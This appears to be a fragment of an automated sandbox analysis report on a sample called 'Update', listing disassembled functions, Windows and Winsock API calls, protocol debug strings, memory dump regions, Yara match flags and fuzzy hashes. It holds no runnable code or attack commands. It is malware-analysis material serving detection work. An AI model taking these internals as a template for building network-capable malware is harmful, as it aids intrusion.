Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
Instruction ID: e23a36aee9568f488b14e02ccbdce45cc04d01c91958f2c1d86c028973892dd3
Opcode Fuzzy Hash: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
Instruction Fuzzy Hash: 592173B6640704ABD220EF79DC85B97B3E8FF89751F104A1EF58AC7654DA71F8008BA4

Function 037F4E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 037F4E99
TryEnterCriticalSection.KERNEL32(?,?), ref: 037F4EB8
TryEnterCriticalSection.KERNEL32(?), ref: 037F4EC2
SetLastError.KERNEL32(0000139F), ref: 037F4ED9
LeaveCriticalSection.KERNEL32(?), ref: 037F4EE2
LeaveCriticalSection.KERNEL32(?), ref: 037F4EE9

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 40f3bfd3e957b147be0dbd60015c1d677a4896d8ff8efe09b900a7a34476617b
Instruction ID: fa4df203a816f2fdc26f5dfd1b9238ed3ef93514b03dbc4a1b6f9845392551f4
Opcode Fuzzy Hash: 40f3bfd3e957b147be0dbd60015c1d677a4896d8ff8efe09b900a7a34476617b
Instruction Fuzzy Hash: 6A1186327007058FD320EA7EEC8497BF3ECFB88325B04096EE615C2640D671E914C7A5

Function 10004E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 10004E79
TryEnterCriticalSection.KERNEL32(?,?), ref: 10004E98
TryEnterCriticalSection.KERNEL32(?), ref: 10004EA2
SetLastError.KERNEL32(0000139F), ref: 10004EB9
LeaveCriticalSection.KERNEL32(?), ref: 10004EC2
LeaveCriticalSection.KERNEL32(00000002), ref: 10004EC9

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
Instruction ID: b6eaa0d5c2d22c0db505b760e803bdb0fa2ef48d94b0f961ed90457994499652
Opcode Fuzzy Hash: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
Instruction Fuzzy Hash: 36118272700354DBE320DBB9DC85A6BB3ECFB88392B41063EE645C7550DA72E804CBA5

Function 037FDD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 037FDD32
SetLastError.KERNEL32(0000007F), ref: 037FDE35

Strings

Main, xrefs: 037FDD1F, 037FDD5C

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: Main
API String ID: 1452528299-521822810
Opcode ID: b7165a18a4b4ab0da077cd41ae3842cbb4602b710658c246eb04321c26266913
Instruction ID: d325d73f5ac4ac2ba1c764ed1edcd30d7cd40f68a38efc4735470810b1288581
Opcode Fuzzy Hash: b7165a18a4b4ab0da077cd41ae3842cbb4602b710658c246eb04321c26266913
Instruction Fuzzy Hash: 0541BF72A00209DFD720DF68D881B6AF3E8FF94314F0846AADA459B355E775E941CB90

Function 6CA9CB29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6CA9CB70
__alloca_probe_16.LIBCMT ref: 6CA9CB9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6CA9CBDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6CA9CBF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6CA9CC37
__alloca_probe_16.LIBCMT ref: 6CA9CC54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6CA9CC96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6CA9CCB9

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 70691c5b004c4241bac5b2ee9f7252c06d6a62805fbdb29675e6bffc85b733d1
Instruction ID: 67b333cb077b2d6906cab8053f99aa2b1b64d96d0044ac42bd4ac8d1a9cc838d
Opcode Fuzzy Hash: 70691c5b004c4241bac5b2ee9f7252c06d6a62805fbdb29675e6bffc85b733d1
Instruction Fuzzy Hash: 2651E172621A16AFEF106FA8CC46FAA3FF8EF0575CF244424F910D6690D730D9958B50

Function 037F3F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 037F3F65
SetLastError.KERNEL32(0000139F,?,74DEDFA0,037F3648), ref: 037F4054

Part of subcall function 037F2BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037F2BD6
Part of subcall function 037F2BC0: SwitchToThread.KERNEL32 ref: 037F2BEA

send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
SetEvent.KERNEL32(?), ref: 037F3FE9
InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
WSACloseEvent.WS2_32(?), ref: 037F4003
shutdown.WS2_32(?,00000001), ref: 037F401B
closesocket.WS2_32(?), ref: 037F4025

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: c69263aa08b8aaf395d2cab07adfbb0af156de501ad604f3f4185b7cb175b6c8
Instruction ID: c971acc5e55116a4b82c1c410fd68d6fbdfe174c62612cf2026403a10712db9a
Opcode Fuzzy Hash: c69263aa08b8aaf395d2cab07adfbb0af156de501ad604f3f4185b7cb175b6c8
Instruction Fuzzy Hash: C4211575200B049FE330EB69D888B5BB7F9BB84710F180E5CE6928BB90C7B9E445CB50

Function 10003F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10003F65
SetLastError.KERNEL32(0000139F,?,74DEDFA0,10003648), ref: 10004054

Part of subcall function 10002B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 10002B96
Part of subcall function 10002B80: SwitchToThread.KERNEL32 ref: 10002BAA

send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
SetEvent.KERNEL32(?), ref: 10003FE9
InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
WSACloseEvent.WS2_32(?), ref: 10004003
shutdown.WS2_32(?,00000001), ref: 1000401B
closesocket.WS2_32(?), ref: 10004025

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
Instruction ID: f90f9a9b3ecf0f3d74d2563f24973b51980f03fc9dc1a8ff13de2f0f8c7e6f1d
Opcode Fuzzy Hash: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
Instruction Fuzzy Hash: 822148B56007109BE321DF64C888B9BB7F9FB44791F04891DF6869B690CBB6F845CB50

Function 037F4060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4074
ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4087
ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4090
ResetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4099

Part of subcall function 037F1350: HeapFree.KERNEL32(?,00000000,?,?,?,037F40A6,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F1390

Part of subcall function 037F1420: HeapFree.KERNEL32(?,00000000,?,?,?,037F40B1,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F143D
Part of subcall function 037F1420: _free.LIBCMT ref: 037F1459

HeapDestroy.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F40B9
HeapCreate.KERNEL32(?,?,?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F40D4
SetEvent.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4150
LeaveCriticalSection.KERNEL32(?,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F4157

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: 1dc34d1fbf655d8907aeca83a4c4428c4850635b079a74d982e27f0e75b3b850
Instruction ID: c1e11b1a7e2780f153841dc1eaa1f060ff5f54429659a02b64453ae91a0acf95
Opcode Fuzzy Hash: 1dc34d1fbf655d8907aeca83a4c4428c4850635b079a74d982e27f0e75b3b850
Instruction Fuzzy Hash: 49311474200A06EFD705EB79D898BAAF7A8FF48310F148699E529CB250DB35A951CF90

Function 10004060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004074
ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004087
ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004090
ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004099

Part of subcall function 10001350: HeapFree.KERNEL32(?,00000000,?,?,?,100040A6,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10001390

Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
Part of subcall function 10001420: _free.LIBCMT ref: 10001459

HeapDestroy.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040B9
HeapCreate.KERNEL32(?,?,?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040D4
SetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004150
LeaveCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004157

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
Instruction ID: 23a0d0040592214b09f8a584f6cc232509badf453808b3f4ba03db8ba96dcbd9
Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
Instruction Fuzzy Hash: 043143B0200A02EFE705CB64C898B96F7A8FF48351F058249E4298B264CB35F951CFD0

Function 006E101B Relevance: 12.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

APIs

_set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 006E101E
_set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 006E1029
__p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 006E1035
__RTC_Initialize.LIBCMT ref: 006E104D
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,006E17FA), ref: 006E1062

Part of subcall function 006E155C: InitializeSListHead.KERNEL32(006E30C0,006E1072), ref: 006E1561

__setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000154F), ref: 006E1080
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 006E109B
_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006E10AA

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
String ID:
API String ID: 1933938900-0
Opcode ID: a023b793de75fa44077c9eb30c2e4e18c434a60f86a688a2090c3d984225cfe3
Instruction ID: bf6ca902cfcfff57102858be2d06cf79806b6f83c0e9d4aba8a952ff0214d097
Opcode Fuzzy Hash: a023b793de75fa44077c9eb30c2e4e18c434a60f86a688a2090c3d984225cfe3
Instruction Fuzzy Hash: 330146F0A433C111D8D033FB0803A9E025B0E83B91B50091DB4129E187ED79848174BF

Function 6CAAEB85 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6CAAEC0B

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
Instruction ID: 191e5109b1b9e247b9187843080cb57d5986bee1e6fb420a4cbb933d1af5aa18
Opcode Fuzzy Hash: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
Instruction Fuzzy Hash: 9EB16672A01255AFEB118FA8CC81BEE7FB5EF56314F184155E800AB781E374D9A6C7E0

Function 037F2140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 037F1610: __vswprintf.LIBCMT ref: 037F1646

_malloc.LIBCMT ref: 037F2330

Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8

Strings

input psh: sn=%lu ts=%lu, xrefs: 037F22DF
input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 037F22AC
input wins: %lu, xrefs: 037F23CF
[RI] %d bytes, xrefs: 037F216F
input probe, xrefs: 037F23A1

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: AllocateHeap__vswprintf_malloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3723585974-868042568
Opcode ID: 4169481eab2b34f6c68927620822025b4adc34d7cb863b6fb7f803ab0af3f0f7
Instruction ID: 0c18f4e3ab14a777ef551ba48771cfe98694af6e97c010782e4509919747542a
Opcode Fuzzy Hash: 4169481eab2b34f6c68927620822025b4adc34d7cb863b6fb7f803ab0af3f0f7
Instruction Fuzzy Hash: 49B19279A002098FCF18DF68D8846AAB7B5BF48310F1949AEDE199F347DB71D941CB90

Function 10002140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 10001610: __vswprintf.LIBCMT ref: 10001646

_malloc.LIBCMT ref: 10002330

Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8

Strings

input wins: %lu, xrefs: 100023CF
input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 100022AC
input probe, xrefs: 100023A1
[RI] %d bytes, xrefs: 1000216F
input psh: sn=%lu ts=%lu, xrefs: 100022DF

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: AllocateHeap__vswprintf_malloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3723585974-868042568
Opcode ID: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
Instruction ID: eab6198d38b35a21c7eee27abceaedf30942dd101684ecb5fd47972168577aa1
Opcode Fuzzy Hash: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
Instruction Fuzzy Hash: A4B19075A002059BEB08CF68D8806AE7BE5FF44390F1546AEED499B34ADB31ED45CB90

Function 037F1830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 037F1878
_free.LIBCMT ref: 037F18B6
_free.LIBCMT ref: 037F18F5
_free.LIBCMT ref: 037F1935
_free.LIBCMT ref: 037F195D
_free.LIBCMT ref: 037F1981
_free.LIBCMT ref: 037F19B9

Part of subcall function 037FF639: RtlFreeHeap.NTDLL(00000000,00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D), ref: 037FF64F
Part of subcall function 037FF639: GetLastError.KERNEL32(00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340), ref: 037FF661

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c09c2663c229486e0deeca5c2d06111e3147180d558eeb8f2e69ddee0aa8faac
Instruction ID: 1729c05c84e5268bc4ff00e2eb9d3d23044d5560fc5f2eeb74a60d09021ebc15
Opcode Fuzzy Hash: c09c2663c229486e0deeca5c2d06111e3147180d558eeb8f2e69ddee0aa8faac
Instruction Fuzzy Hash: 9E5150B6A00211CFC714DF58C584965BBB6FF99224B6980ADC60A5F321C732BD42DFD1

Function 10001830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10001878
_free.LIBCMT ref: 100018B6
_free.LIBCMT ref: 100018F5
_free.LIBCMT ref: 10001935
_free.LIBCMT ref: 1000195D
_free.LIBCMT ref: 10001981
_free.LIBCMT ref: 100019B9

Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
Instruction ID: a8bd5bf31f2101c09de15a5e31c6c05fc03f2a154fed00425f0cdbd26510a762
Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
Instruction Fuzzy Hash: 9C511C76A00211CFE704DF58C5D4899BBE6FF89294726C0ADD5096B326CB32BD42CB91

Function 037F3870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 037F3883
SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037F38C4
WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 037F3931
GetCurrentThreadId.KERNEL32 ref: 037F395C
GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037F39F4
SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 037F3A22
WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 037F3A39

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: 853d5b1320306e17b703e95c8ac024245033e86184f22939640f8c8fa98ad183
Instruction ID: 1270f246d1c769ccb8b2cad65aac922ea610c0a1e8ef2465b2a7bf9f155eae9f
Opcode Fuzzy Hash: 853d5b1320306e17b703e95c8ac024245033e86184f22939640f8c8fa98ad183
Instruction Fuzzy Hash: B851A2786047019FEB60EF65C984BAAB7E8FF44718F144959EA6ADB380EB31F440CB51

Function 6CA9DA10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CA9DA47
___except_validate_context_record.LIBVCRUNTIME ref: 6CA9DA4F
_ValidateLocalCookies.LIBCMT ref: 6CA9DAD8
__IsNonwritableInCurrentImage.LIBCMT ref: 6CA9DB03
_ValidateLocalCookies.LIBCMT ref: 6CA9DB58

Strings

csm, xrefs: 6CA9DAED

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

